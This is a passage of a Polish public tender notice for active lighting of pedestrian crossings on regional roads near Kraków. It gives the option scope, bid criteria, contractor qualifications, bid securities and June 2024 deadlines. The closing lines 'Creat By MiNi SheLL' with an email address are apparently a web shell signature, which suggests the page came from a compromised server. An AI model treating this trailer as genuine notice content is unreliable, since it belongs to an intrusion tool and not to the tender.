bezpieczeństwa lub sygnalizacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje w ramach zastrzeganego prawa opcji wykonanie robót budowlanych obejmujących w szczególności: - realizację robót ziemnych wraz z wykonaniem przewiertów pod drogami, - wykonanie kanalizacji kablowej z użyciem rur osłonowych i odtworzeniem terenu, - montaż konstrukcji wsporczych (fundamenty, wysięgniki, słupy oświetleniowe), - montaż opraw asymetrycznych, czujników obecności pieszego, czujnika zmierzchowego lub zegara astronomicznego z czujnikiem zmierzchowym, - montaż okablowania (kabel WLZ, instalacja zasilająca i sterująca), - opracowanie dokumentacji technicznej branżowej i powykonawczej, - przygotowania map do celów projektowych z naniesieniem przebiegu nowych tras kablowych i uzgodnień branżowych, - uzgodnienie projektów stałej organizacji ruchu, - uruchomienie doświetlenia w terenie, w następujących lokalizacjach (8 punktów): • DW 780 odc. 320 km 0+677 Chełmek, • DW 776 odc. 080 km 3+168 Siedliska, • była DK 7 odc. 611+070 Książ Wielki, • DW 776 odc. 110 km 0+800 Opatkowice, • DW 776 odc. 040 km 0+014 Kocmyrzów, • DW 794 odc. 220 km 0+822 Zielonki, • DW 980 odc. 060 km 4+120 Siemiechów, • DW 775 odc. 055 km 0+700 Proszowice.<br/>Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Powyżej określony zakres objęty prawem opcji (zakres opcjonalny zamówienia) przewidziany zostaje na okoliczność istnienia stosownych możliwości finansowych po stronie Zamawiającego w kontekście realizacji tego zakresu prac oraz uznania potrzeby ich wykonania. Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego prawa opcji zgodnie z zapotrzebowaniem i posiadanymi możliwościami finansowymi. Wskazany wyżej zakres opcjonalny stanowi maksymalny zakres zastrzeganego prawa opcji. Prawo opcji może być realizowane przez Zamawiającego etapowo / częściowo / fragmentarycznie w okresie realizacji zamówienia – na warunkach określonych w umowie (zał. nr 9.2. SWZ – wzór umowy (dla Części nr 2)). Wykonawca jest zobowiązany do realizacji prac (robót) w ramach zastrzeżonego prawa opcji w przypadku i w zakresie, w jakim korzysta z niego Zamawiający zgodnie z treścią złożonego oświadczenia Zamawiającego o skorzystaniu z prawa opcji i warunkami określonymi w SWZ (umowie) – w momencie złożenia takiego oświadczenia następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej z zakresu prac (robót) objętego realizowaną na mocy danego oświadczenia opcją. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert: cena – 60 % oraz okres gwarancji i rękojmi – 40 %.<br/>W kryterium cena ocenie podlegać będzie zaoferowana łączna cena ofertowa (stanowiąca sumę ceny za zakres podstawowy zamówienia oraz ceny za zakres opcjonalny zamówienia).<br/>W kryterium okres gwarancji i rękojmi ocenie podlegać będzie długość okresu gwarancji jakości i rękojmi za wady zaoferowana przez Wykonawcę na wykonany przedmiot umowy – w stosunku do długości przedziału określającego dopuszczalne limity okresu gwarancji i rękojmi określone przez Zamawiającego, tj. minimalny okres gwarancji i rękojmi, który może zaoferować Wykonawca, wynosi 36 miesięcy licząc od daty odbioru końcowego przedmiotu umowy, natomiast maksymalny okres gwarancji i rękojmi, który może zaoferować Wykonawca, wynosi 60 miesięcy licząc od daty odbioru końcowego przedmiotu umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia (każdej z części zamówienia stanowiących przedmiot niniejszego postępowania) mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa wymagań w tym zakresie;<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa wymagań w tym zakresie;<br/>3. sytuacji ekonomicznej lub finansowej – Zamawiający w tym zakresie określa następujące minimalne poziomy zdolności:<br/>Wykonawca spełnia warunek jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową w kwocie co najmniej 600 000,00 zł (słownie: sześćset tysięcy złotych 00/100).<br/>UWAGA! - Przedmiotowy warunek jest odrębny dla każdej z części zamówienia stanowiących przedmiot niniejszego postępowania – w przypadku składania przez Wykonawcę oferty jedynie na jedną część zamówienia spośród części stanowiących przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku jednostkowo (tzn. wykazania posiadania środków finansowych lub zdolności kredytowej w kwocie co najmniej 600 000,00 zł), natomiast w przypadku składania przez Wykonawcę ofert na obie części zamówienia stanowiące przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku podwójnie (tzn. wykazania posiadania środków finansowych lub zdolności kredytowej w kwocie co najmniej 1 200 000,00 zł).<br/>4. zdolności technicznej lub zawodowej – Zamawiający w tym zakresie określa następujące minimalne poziomy zdolności:<br/>4.1. Wykonawca spełnia warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie, wykonał co najmniej dwadzieścia aktywnych doświetleń przejść dla pieszych usytuowanych w ciągu dróg publicznych z wykorzystaniem lamp oświetleniowych asymetrycznych. <br/>UWAGA! - Zamawiający informuje, iż przez użyte sformułowanie „aktywne doświetlenie przejścia dla pieszych” należy rozumieć układ, którego włączenie / wyłączenie odbywało się poprzez zastosowanie czujnika zmierzchowego lub zegara astronomicznego z czujnikiem zmierzchowym, a sterowanie rozjaśnianiem i ściemnianiem opraw asymetrycznych realizowane było poprzez wyzwalanie czujników obecności pieszego. - Przedmiotowy warunek jest odrębny dla każdej z części zamówienia stanowiących przedmiot niniejszego postępowania – w przypadku składania przez Wykonawcę oferty jedynie na jedną część zamówienia spośród części stanowiących przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku jednostkowo (tzn. wykazania legitymowania się wymaganym, określonym w tym warunku doświadczeniem odnoszącym się do co najmniej dwudziestu aktywnych doświetleń przejść dla pieszych), natomiast w przypadku składania przez Wykonawcę ofert na obie części zamówienia stanowiące przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku podwójnie (tzn. wykazania legitymowania się wymaganym, określonym w tym warunku doświadczeniem odnoszącym się do co najmniej czterdziestu aktywnych doświetleń przejść dla pieszych). - Wykonanie robót określonych w przedmiotowym warunku mogło nastąpić w ramach jednego lub odrębnych zadań. - Zamawiający informuje, iż w przypadku wykazywania na potrzeby potwierdzania spełniania przez Wykonawcę niniejszego warunku doświadczenia w realizacji zadania wykonanego przez grupę wykonawców (np. konsorcjum), za miarodajne z punktu widzenia wykazania spełniania tego warunku zostanie uznane jedynie doświadczenie polegające na faktycznej realizacji prac wskazanych w treści tego warunku. Nie zostanie uznane za potwierdzenie spełniania tego warunku legitymowanie się nabyciem doświadczenia w realizacji zadania wykonanego przez grupę wykonawców (np. konsorcjum) jedynie poprzez fakt bycia jednym z członków tej grupy (np. członkiem konsorcjum), jeżeli faktycznie nie zrealizowało się w ramach tego zadania prac wskazanych w treści tego warunku, chyba że Wykonawca wykaże, iż nawet pomimo braku faktycznej realizacji w ramach danego zadania wskazanych w warunku prac to jednak zakres i przedmiot czynności, obowiązków i odpowiedzialności faktycznie odnosił się do całości zadania (tj. również do prac faktycznie niewykonywanych), co oznaczałoby nabycie doświadczenia odnośnie całości jego przedmiotu (tj. również do prac faktycznie niewykonywanych).<br/>4.2. Wykonawca spełnia warunek jeżeli wykaże, że dysponuje: 1) jedną osobą na stanowisko Kierownika robót posiadającą uprawnienia budowlane do kierowania robotami elektrycznymi; 2) dwiema osobami posiadającymi uprawnienia SEP do 1 kV w zakresie dozoru i eksploatacji.<br/>UWAGA! - Zamawiający dopuszcza możliwość, aby wskazana została jedna (ta sama) osoba, która posiada równocześnie uprawnienia budowlane do kierowania robotami elektrycznymi – na stanowisko Kierownika robót (ppkt 1) oraz posiada uprawnienia SEP w zakresie dozoru i eksploatacji (ppkt 2 – jedna z osób), przy czym w takowej sytuacji odnośnie takiej osoby musi zostać wykazane spełnianie wszystkich wymagań dotyczących uprawnień przypisanych do każdej z łączonych funkcji. - Przedmiotowy warunek jest odrębny dla każdej z części zamówienia stanowiących przedmiot niniejszego postępowania – w przypadku składania przez Wykonawcę oferty jedynie na jedną część zamówienia spośród części stanowiących przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku jednostkowo (tzn. wykazania dysponowania wymaganym, określonym w tym warunku personelem obejmującym jedną osobę na stanowisko Kierownika robót oraz dwie osoby posiadające uprawnienia SEP do 1 kV w zakresie dozoru i eksploatacji – przy zastrzeżeniu tiretu pierwszego), natomiast w przypadku składania przez Wykonawcę ofert na obie części zamówienia stanowiące przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku podwójnie (tzn. wykazania dysponowania wymaganym, określonym w tym warunku personelem obejmującym dwie (różne) osoby na stanowisko Kierownika robót oraz cztery (różne) osoby posiadające uprawnienia SEP do 1 kV w zakresie dozoru i eksploatacji – przy zastrzeżeniu tiretu pierwszego). - Nadmienia się, iż odnośnie osób wskazanych w ppkt 2 (tzn. osób posiadających uprawnienia SEP do 1 kV w zakresie dozoru i eksploatacji) zastosowanie ma klauzula zatrudnienia określona w cz. I pkt 10, tzn. wymagane jest, aby osoby te w kontekście realizacji niniejszego zamówienia zatrudnione były na podstawie stosunku pracy.<br/>4.3. Wykonawca spełnia warunek jeżeli wykaże, że dysponuje: 1) co najmniej jedną maszyną do przewiertów sterowanych (wiertnicą) lub przepychów; 2) co najmniej jednym samochodowym podnośnikiem koszowym; 3) co najmniej jednym dźwigiem samojezdnym lub pojazdem ciężarowym z HDS; 4) co najmniej jedną koparką.<br/>UWAGA! - Przedmiotowy warunek jest odrębny dla każdej z części zamówienia stanowiących przedmiot niniejszego postępowania – w przypadku składania przez Wykonawcę oferty jedynie na jedną część zamówienia spośród części stanowiących przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku jednostkowo (tzn. wykazania dysponowania wymaganym, określonym w tym warunku sprzętem obejmującym po jednej szt. każdej z maszyn / każdego z pojazdów określonych w ppkt 1 – 4), natomiast w przypadku składania przez Wykonawcę ofert na obie części zamówienia stanowiące przedmiot niniejszego postępowania Wykonawca zobowiązany jest do wykazania spełniania przedmiotowego warunku podwójnie (tzn. wykazania dysponowania wymaganym, określonym w tym warunku sprzętem obejmującym po dwie szt. każdej z maszyn / każdego z pojazdów określonych w ppkt 1 – 4). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP – w zakresie określonym w cz. II pkt 2.1. SWZ. Przedmiotowe oświadczenie winno zostać złożone wraz z ofertą na formularzu udostępnionym w ramach SWZ. 2) Podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia wskazane w ramach cz. II pkt 4.2. ppkt 1.2. SWZ (wyszczególnienie wszystkich informacji w tym zakresie w treści niniejszego ogłoszenia nie jest możliwe z uwagi na brak wystarczającej ilości miejsca na ich tu wskazanie, toteż zastosowanie ma w tym zakresie odesłanie do treści SWZ, gdzie wskazany jest pełen katalog tych podmiotowych środków dowodowych). Przedmiotowe dokumenty winny zostać złożone w trybie wskazanym w SWZ (na wezwanie Zamawiającego).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP – w zakresie określonym w cz. II pkt 3.1. SWZ. Przedmiotowe oświadczenie winno zostać złożone wraz z ofertą na formularzu udostępnionym w ramach SWZ. 2) INFORMACJA BANKU LUB SPÓŁDZIELCZEJ KASY OSZCZĘDNOŚCIOWO-KREDYTOWEJ (SKOK) potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem. Informacja ta winna potwierdzać wysokość posiadanych środków lub zdolność kredytową Wykonawcy w zakresie wskazanym w warunku określonym w cz. II pkt 3.1.3. SWZ – w przypadku, gdy w informacji wartość posiadanych środków finansowych lub zdolność kredytowa została wskazana w innych walutach niż PLN (zł), Wykonawca zobowiązany jest do przeliczenia tej waluty według średniego kursu NBP na dzień wystawienia informacji. Przedmiotowa informacja winna zostać złożona w trybie wskazanym w SWZ (na wezwanie Zamawiającego). 3) WYKAZ ROBÓT BUDOWLANYCH wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia, którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wykonawca w przedmiotowym wykazie wskaże roboty budowlane określone w warunku wskazanym w cz. II pkt 3.1.4.1. SWZ oraz złoży dowody, że roboty te zostały wykonane należycie. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, przedmiotowy wykaz winien dotyczyć jedynie robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. Przedmiotowy wykaz winien zostać złożony na formularzu udostępnionym w ramach SWZ i w trybie tam wskazanym (na wezwanie Zamawiającego). 4) WYKAZ OSÓB skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykonawca w przedmiotowym wykazie wskaże osoby w zakresie określonym w warunku wskazanym w cz. II pkt 3.1.4.2. SWZ oraz poda informacje ich dotyczące(w zakresie określonym w tym wykazie) niezbędne celem weryfikacji spełniania przez Wykonawcę tego warunku. Przedmiotowy wykaz winien zostać złożony na formularzu udostępnionym w ramach SWZ i w trybie tam wskazanym (na wezwanie Zamawiającego). 5) WYKAZ NARZĘDZI, WYPOSAŻENIA ZAKŁADU LUB URZĄDZEŃ TECHNICZNYCH dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. Wykonawca w przedmiotowym wykazie wskaże sprzęt (maszyny, pojazdy) w zakresie określonym w warunku wskazanym w cz. II pkt 3.1.4.3. SWZ oraz poda informacje jego dotyczące (w zakresie określonym w tym wykazie) niezbędne celem weryfikacji spełniania przez Wykonawcę tego warunku. Przedmiotowy wykaz winien zostać złożony na formularzu udostępnionym w ramach SWZ i w trybie tam wskazanym (na wezwanie Zamawiającego).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty składane wraz z ofertą (oprócz dokumentów wskazanych wyżej) - zgodnie z zapisami SWZ: a) oświadczenie wstępne dotyczące podmiotu trzeciego (jeżeli dotyczy), b) zobowiązanie podmiotu trzeciego (jeżeli dotyczy), c) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy), d) pełnomocnictwo lub inny dokument potwierdzający umocowanie osoby (osób) reprezentujących Wykonawcę / Wykonawców wspólnie ubiegających się o udzielenie zamówienia / podmiot trzeci (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Składając ofertę Wykonawca zobowiązany jest wnieść wadium w wysokości: - Część nr 1 – 20 000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100), - Część nr 2 – 25 000,00 zł (słownie: dwadzieścia pięć tysięcy złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Szczegółowe informacje dotyczące składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zawarte są w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przewiduje się możliwość dokonywania zmian umowy w zakresie dopuszczalnym zgodnie z regulacjami ustawy PZP oraz postanowieniami umownymi zawartymi w zał. nr 9.1. /9.2. SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-Zamówienia (https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-df10eb70-225f-11ef-87ba-8eb060fd7bb8)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. W ramach strony postępowania na platformie e-Zamówienia zapewniony jest bezpłatny, pełny, bezpośredni inieograniczony dostęp do SWZ i ogłoszenia o zamówieniu, jak również wszelkich ewentualnych zmian i wyjaśnień treści SWZ i ogłoszenia o zamówieniu oraz innych dokumentów zamówienia bezpośrednio związanych z niniejszym postępowaniem – w ramach odesłania za pomocą / poprzez link (adres): https://www.zdw.krakow.pl/zamowieniapubliczne/zdw-dn-4-271-46-24/.<br/>2. Zamówienie stanowiące przedmiot niniejszego postępowania jest podzielone na części, których mają dotyczyć oferty częściowe (Część nr 1 i Część nr 2). Zamawiający dopuszcza składanie ofert częściowych na dowolną ilość spośród dwóch części zamówienia stanowiącego przedmiot niniejszego postępowania. Zamawiający nie stosuje zastrzeżeń i ograniczeń co do możliwości składania przez jednego Wykonawcę ofert częściowych oraz możliwości udzielenia jednemu Wykonawcy określonej liczby części zamówienia.<br/>3. Termin wykonania zamówienia (w zakresie wszystkich części zamówienia stanowiących przedmiot niniejszego postępowania): • zakres podstawowy zamówienia: 5 miesięcy od daty zawarcia umowy, przy czym nie później niż do dnia 20.12.2024 r. Za obowiązujący Wykonawcę termin realizacji przedmiotu umowy w kontekście zakresu podstawowego zamówienia będzie uważana albo data wyznaczająca upływ okresu 5-miesięcznego liczonego od daty zawarcia umowy, albo data 20.12.2024 r. – w zależności od faktu, która data zaistnieje wcześniej mając na uwadze moment czasowy zawarcia umowy. Zaznacza się, iż określenie terminu realizacji zakresu podstawowego zamówienia w kontekście wariantu datowego (w postaci wskazanej wyżej daty) jest wymagane i uzasadnione obiektywną przyczyną – specyfiką przedmiotu zamówienia oraz koniecznością uwzględnienia uwarunkowań finansowych istniejących po stronie Zamawiającego (determinowanych zapisami planów finansowych Województwa Małopolskiego) implikujących konieczność zrealizowania zadania oraz wydatkowania i rozliczenia przez Zamawiającego środków finansowych w terminie przed końcem 2024 r. • zakres opcjonalny zamówienia (w przypadku jego uruchomienia): 3 miesiące od daty złożenia oświadczenia Zamawiającego o skorzystaniu z prawa opcji.

Creat By MiNi SheLL
Email: jattceo@gmail.com